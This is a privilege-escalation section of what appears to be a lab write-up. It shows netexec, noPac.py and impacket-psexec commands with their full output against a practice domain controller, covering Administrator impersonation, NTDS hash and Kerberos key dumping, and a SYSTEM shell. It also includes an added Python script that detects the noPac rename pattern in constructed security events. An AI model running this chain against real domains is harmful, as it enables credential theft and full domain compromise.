Priv Esc
Last updated
$ netexec smb 192.168.170.175 -u L.Livingstone -H 19a3a7550ce8c505c2d46b5e39d6f808 -M nopac
SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
NOPAC 192.168.170.175 445 RESOURCEDC TGT with PAC size 1450
NOPAC 192.168.170.175 445 RESOURCEDC TGT without PAC size 653
NOPAC 192.168.170.175 445 RESOURCEDC
NOPAC 192.168.170.175 445 RESOURCEDC VULNERABLE
NOPAC 192.168.170.175 445 RESOURCEDC Next step: https://github.com/Ridter/noPac
$ echo 192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local | sudo tee -a /etc/hosts
192.168.170.175 RESOURCEDC resourced.local RESOURCEDC.resourced.local
$ python noPac.py resourced.local/L.Livingstone -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.170.175 -dc-host RESOURCEDC --impersonate Administrator -dump -just-dc-user Administrator -use-ldap
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target RESOURCEDC.resourced.local
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-LKSXTEHHJQ3$"
[*] MachineAccount "WIN-LKSXTEHHJQ3$" password = FuKyJY@u0fZW
[*] Successfully added machine account WIN-LKSXTEHHJQ3$ with password FuKyJY@u0fZW.
[*] WIN-LKSXTEHHJQ3$ object = CN=WIN-LKSXTEHHJQ3,CN=Computers,DC=resourced,DC=local
[*] WIN-LKSXTEHHJQ3$ sAMAccountName == RESOURCEDC
[*] Saving a DC's ticket in RESOURCEDC.ccache
[*] Reseting the machine account to WIN-LKSXTEHHJQ3$
[*] Restored WIN-LKSXTEHHJQ3$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_RESOURCEDC.resourced.local.ccache
[*] Attempting to del a computer with the name: WIN-LKSXTEHHJQ3$
[-] Delete computer WIN-LKSXTEHHJQ3$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
[*] Cleaning up...
Administrator:8e0efd059433841f73d171c69afdda7c
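The noPac output above shows the trace this chain leaves in the directory: a new computer account is created (because ms-DS-MachineAccountQuota is 10, not 0), its sAMAccountName is changed to the DC's name without the trailing `$`, a TGT is obtained, and the name is changed back. From the defender's side, those steps correspond to Security events 4741 (computer account created) and 4742 (computer account changed). The script below is an added example, not part of the original write-up or of the noPac or netexec projects. It runs over constructed event records; the record fields (`subject`, `target_sam`, `changed`) are assumptions modelled on the text of those events, not a parser for real EVTX data, and `DOMAIN_CONTROLLERS` is a constructed inventory.

```python
"""Flag the sAMAccountName-spoofing pattern (noPac) in constructed 4741/4742 records.

Added example: the event layout below is an assumption, not the real EVTX schema.
"""
from dataclasses import dataclass, field


@dataclass
class SecurityEvent:
    event_id: int                      # 4741 = computer created, 4742 = computer changed
    subject: str                       # account that performed the change
    target_sam: str                    # SAM account name of the computer object at the time
    changed: dict = field(default_factory=dict)  # attribute -> new value (4742 only)


# Constructed sample records approximating what the session above would generate,
# plus one benign computer join for contrast.
SAMPLE_EVENTS = [
    SecurityEvent(4741, "RESOURCED\\L.Livingstone", "WIN-LKSXTEHHJQ3$"),
    SecurityEvent(4742, "RESOURCED\\L.Livingstone", "WIN-LKSXTEHHJQ3$",
                  {"SAM Account Name": "RESOURCEDC"}),
    SecurityEvent(4742, "RESOURCED\\L.Livingstone", "RESOURCEDC",
                  {"SAM Account Name": "WIN-LKSXTEHHJQ3$"}),
    SecurityEvent(4741, "RESOURCED\\Administrator", "WKS-042$"),
    SecurityEvent(4742, "RESOURCED\\Administrator", "WKS-042$",
                  {"DNS Host Name": "wks-042.resourced.local"}),
]

# Constructed inventory of domain controller account names (without the trailing $).
DOMAIN_CONTROLLERS = {"RESOURCEDC"}


def find_nopac_indicators(events, dcs=DOMAIN_CONTROLLERS):
    """Return (reason, subject, old_sam, new_sam) for suspicious sAMAccountName changes.

    Two independent checks on every 4742 that rewrites SAM Account Name:
      - the new name lacks the trailing '$' every computer account should carry;
      - the new name collides with a domain controller's account name.
    """
    dc_names = {d.upper().rstrip("$") for d in dcs}
    findings = []
    for e in events:
        if e.event_id != 4742:
            continue
        new_sam = e.changed.get("SAM Account Name")
        if new_sam is None:
            continue
        if not new_sam.endswith("$"):
            findings.append(("computer-sam-without-dollar", e.subject, e.target_sam, new_sam))
        if new_sam.upper().rstrip("$") in dc_names:
            findings.append(("computer-sam-matches-dc", e.subject, e.target_sam, new_sam))
    return findings


def machine_accounts_created_by(events):
    """Map each subject to the computer accounts it created (4741).

    Any non-admin subject appearing here is only possible while
    ms-DS-MachineAccountQuota is above 0; the mitigation is to set it to 0
    and join machines through a delegated, audited account instead.
    """
    created = {}
    for e in events:
        if e.event_id == 4741:
            created.setdefault(e.subject, []).append(e.target_sam)
    return created


if __name__ == "__main__":
    for finding in find_nopac_indicators(SAMPLE_EVENTS):
        print("ALERT", *finding)
    for subject, accounts in machine_accounts_created_by(SAMPLE_EVENTS).items():
        print("created-by", subject, accounts)
```

Both checks fire on the rename step alone, so the alert does not depend on catching the later rename-back; in a real deployment the same logic would read the `SAM Account Name` field of 4742 events from the DC's Security log, and the DC inventory would come from the directory rather than a hard-coded set.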
$ netexec smb 192.168.170.175 -u Administrator -H 8e0efd059433841f73d171c69afdda7c
SMB 192.168.170.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:False)
SMB 192.168.170.175 445 RESOURCEDC [+] resourced.local\Administrator:8e0efd059433841f73d171c69afdda7c (Pwn3d!)
$ impacket-psexec resourced.local/Administrator@192.168.170.175 -hashes :8e0efd059433841f73d171c69afdda7c
Impacket v0.12.0.dev1+20240807.21946.829239e - Copyright 2023 Fortra
[*] Requesting shares on 192.168.170.175.....
[*] Found writable share ADMIN$
[*] Uploading file oWGowvHH.exe
[*] Opening SVCManager on 192.168.170.175.....
[*] Creating service RERK on 192.168.170.175.....
[*] Starting service RERK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> hostname && whoami.exe && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
ResourceDC
nt authority\system
54564fec8409f1ef939bc1292ab5192d
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.175
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254